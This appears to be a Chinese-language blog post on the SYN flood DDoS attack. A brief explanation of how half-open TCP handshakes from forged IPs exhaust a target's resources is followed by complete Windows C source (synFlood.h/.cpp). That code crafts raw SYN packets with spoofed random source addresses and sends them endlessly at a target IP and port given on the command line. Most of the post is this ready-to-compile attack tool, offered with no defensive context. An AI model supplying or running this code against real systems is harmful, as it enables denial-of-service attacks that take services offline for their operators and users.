SynFlood---Ddos洪泛攻击（VC6.0）

熟悉tcp的都知道，在connect时候，有三次握手过程。也就是所谓的[SYN] [SYN+ACK] [ACK]，在目的主机收到syn后，会回复一个确认包，但是若是我源主机ip并不存在，那么并不能返回三次握手中的[ACK]包，导致目标主机不断为到来的连接分配资源，这样，只要源主机不断发送SYN报文，伪造大量的ip地址，目的主机最终将会由于资源耗尽而崩溃。

/************************************************************************//*synFlood.h*//*2013-3-18*//************************************************************************/typedef unsigned short ushort;typedef unsigned long ulong;typedef unsigned int uint;typedef unsigned char uchar;//ip首部typedef struct ip_hdr {uchar h_verlen; //4位首部长度,4位IP版本号uchar tos; //8位服务类型TOSushort total_len; //16位总长度（字节）ushort ident; //16位标识ushort frag_and_flags; //3位标志位(另外13位为片偏移)uchar ttl; //8位生存时间 TTLuchar protocols; //8位协议 (如ICMP，TCP等)ushort chksum; //16位IP首部校验和uint sourceIP; //32位源IP地址uint destIP; //32位目的IP地址}IP_HDR;//tcp首部typedef struct tcp_hdr{ushort sourcePort;//16位源端口号ushort destPort;//16位目的端口号uint seq;//32位序号uint ack;//32位确认序号uchar h_lenres;//4位首部长度，6位保留uchar flag;//6位标识ushort win;//16位窗口大小ushort chksum;//16位校验和ushort urgpoint;//16位紧急指针}TCP_HDR;//tcp伪首部,用于校验和的计算typedef struct pre_tcp_hdr{ulong sourceAddr; //32位源地址ulong destAddr; //32位目的地址char mbz;uchar ptcl; //8位协议类型ushort tcplen; //16位TCP长度}PRE_HDR;

/************************************************************************//*synFlood.cpp*//*2013-03-18                                                          *//************************************************************************/#include <stdio.h>#include <winsock2.h>#include <time.h>#include <windows.h>#include <string.h>#include <WS2TCPIP.H>#include "synFlood.h"#define SLEEPTIME 10SOCKET sock;SOCKADDR_IN addr_in;IP_HDR ipHdr;TCP_HDR tcpHdr;PRE_HDR preHdr;int SourcePort;char sendBuf[60]={0};int rect;#pragma comment(lib, "ws2_32.lib")//计算校验和的子函数ushort chkSum(ushort *buffer, int size){ulong cksum=0;while(size >1){cksum+=*buffer++;size -=sizeof(ushort);}if(size){cksum += *(uchar*)buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >>16);return (ushort)(~cksum);}//数据包首部填充int dataFill(char * argv[]){srand((int)time(0));//填充IP首部ipHdr.h_verlen=(4<<4 | sizeof(ipHdr)/sizeof(ulong));ipHdr.tos=0;ipHdr.total_len=htons(sizeof(ipHdr)+sizeof(ipHdr)); //IP总长度ipHdr.ident=1;ipHdr.frag_and_flags=0; //无分片ipHdr.ttl=(uchar)GetTickCount()%87+123;;ipHdr.protocols=IPPROTO_TCP; // 协议类型为 TCPipHdr.chksum=0; //效验位先初始为0ipHdr.sourceIP=htonl(GetTickCount()*474695); //随机产生一个伪造的源IPipHdr.destIP=inet_addr(argv[1]); //目标IP//printf("%d\n\n",ipHdr.destIP);//填充TCP首部SourcePort=GetTickCount()*43557%9898; //随机产生一个本机端口号//printf("%d\n\n",SourcePort);tcpHdr.destPort=htons(atoi(argv[2])); //目的端口tcpHdr.sourcePort=htons(SourcePort); //源端口号tcpHdr.seq=htonl(0x12345678); tcpHdr.ack=0; tcpHdr.h_lenres=(sizeof(tcpHdr)/4<<4|0);tcpHdr.flag=2; //为SYN请求tcpHdr.win=htons(512);//窗口大小tcpHdr.urgpoint=0;tcpHdr.chksum=0;//填充TCP伪首部用来计算TCP头部的效验和preHdr.sourceAddr=ipHdr.sourceIP;preHdr.destAddr=ipHdr.destIP;preHdr.mbz=0;preHdr.ptcl=IPPROTO_TCP;preHdr.tcplen=htons(sizeof(tcpHdr));//tcp协议长度return true;}//发送数据int sendData(){rect=sendto(sock, sendBuf, sizeof(ipHdr)+sizeof(tcpHdr), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));if (rect==SOCKET_ERROR){printf("send error!:%x",WSAGetLastError());return false;}elseprintf("success send\n");Sleep(SLEEPTIME);return true;}int main(int argc,char *argv[]){WORD wVersionRequested;WSADATA wsaData;int err;BOOL flag;//socket版本检测wVersionRequested = MAKEWORD( 2, 2 );err = WSAStartup( wVersionRequested, &wsaData );if ( err != 0 ) {printf("WSAStartup Error!");return false;}if ( LOBYTE( wsaData.wVersion ) != 2 ||        HIBYTE( wsaData.wVersion ) != 2 ) {printf("Could not find a usable WinSock DLL\n");WSACleanup( );return false; }//输入检测if (argc < 3 || argc >4 ){ printf("input error!\n");return false;}if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)//管理员权限才可以生成原始套接字{printf("Socket Error!\n");return false;}flag=true;if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR){printf("setsockopt IP_HDRINCL error!\n");return false;}int nSendTime=30*1000;//设置超时时间if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nSendTime, sizeof(nSendTime))==SOCKET_ERROR) {printf("setsockopt SO_SNDTIMEO error!\n");return false;}addr_in.sin_family=AF_INET;addr_in.sin_port=htons(atoi(argv[2]));//目的端口addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);//目的ipwhile(1){dataFill(argv);//利用tcp报头与伪报头计算校验和memcpy(sendBuf, &preHdr, sizeof(preHdr));memcpy(sendBuf+sizeof(preHdr), &tcpHdr, sizeof(tcpHdr));tcpHdr.chksum=chkSum((ushort *)sendBuf,sizeof(preHdr)+sizeof(tcpHdr));//将伪造的ip报头与tcp报头封装发送memcpy(sendBuf, &ipHdr, sizeof(ipHdr));memcpy(sendBuf+sizeof(ipHdr), &tcpHdr, sizeof(tcpHdr));sendData();}closesocket(sock);WSACleanup();return 0;}